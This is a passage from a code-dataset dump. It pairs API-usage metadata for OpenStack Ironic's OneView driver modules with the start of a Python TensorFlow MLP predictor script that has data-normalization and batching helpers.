{"api_name": "ironic.common.exception", "line_number": 240, "usage_type": "name"}, {"api_name": "ironic.common.i18n._", "line_number": 242, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.oneview.common.get_oneview_client", "line_number": 246, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.oneview.common", "line_number": 246, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.oneview.power.OneViewPower", "line_number": 249, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.oneview.power", "line_number": 249, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.oneview.management.OneViewManagement", "line_number": 250, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.oneview.management", "line_number": 250, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.fake.FakeBoot", "line_number": 251, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.fake", "line_number": 251, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.fake.FakeDeploy", "line_number": 252, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.fake", "line_number": 252, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.fake.FakeInspect", "line_number": 253, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.fake", "line_number": 253, "usage_type": "name"}]} +{"seq_id": "606749086", "text": "'''\nPredictor MLP model for gpu-cloud\n'''\n\nfrom __future__ import print_function\nfrom argparse import ArgumentParser, ArgumentDefaultsHelpFormatter\nimport tensorflow as tf\nimport numpy as np\nimport csv\nimport random\ndef loadNormData(norm_file):\n\tret_vectors = []\n\twith open(norm_file,\"r\") as fp:\n\t\tvector_lines = fp.readlines()\n\t\tfor line in vector_lines:\n\t\t\tnorm_info = []\n\t\t\t\ndef unnormalizeData(vectors, norm_info):\n\tfor i in range(len(vectors[0])):\n\t\tmin_num = norm_info[i][0]\n\t\tmax_num = norm_info[i][1]\n\t\tif min_num != max_num:\n\t\t\tfor j in range(len(vectors)):\n\t\t\t\tvectors[j][i] = (max_num - min_num) * vectors[j][i] + min_num\n\ndef returnLog(vectors): \n\tnew_vectors = []\n\tfor i in range(len(vectors)):\n\t\tvector = []\n#\t\tfor j in range(len(vectors[0])):\n#\t\t\tvector.append(np.log)\n#\t\tprint(vector)\n\t\tnew_vectors.append(np.log(vectors[i]))\n\treturn new_vectors\ndef returnExp(vectors):\n\tnew_vectors = []\n\tfor i in range(len(vectors)):\n\t\t#vector = []\n\t\t#for j in range(len(vectors[0])):\n\t\t#vector.append(np.exp(vectors[i][j]))\n\t\tnew_vectors.append(np.exp(vectors[i]))\n\treturn new_vectors\n\n\t\t\ndef getRandBatch(data,label,batch_size):\n\ti=0\n\tdata_batch = []\n\tlabel_batch = []\n\tN = len(data)\n\twhile i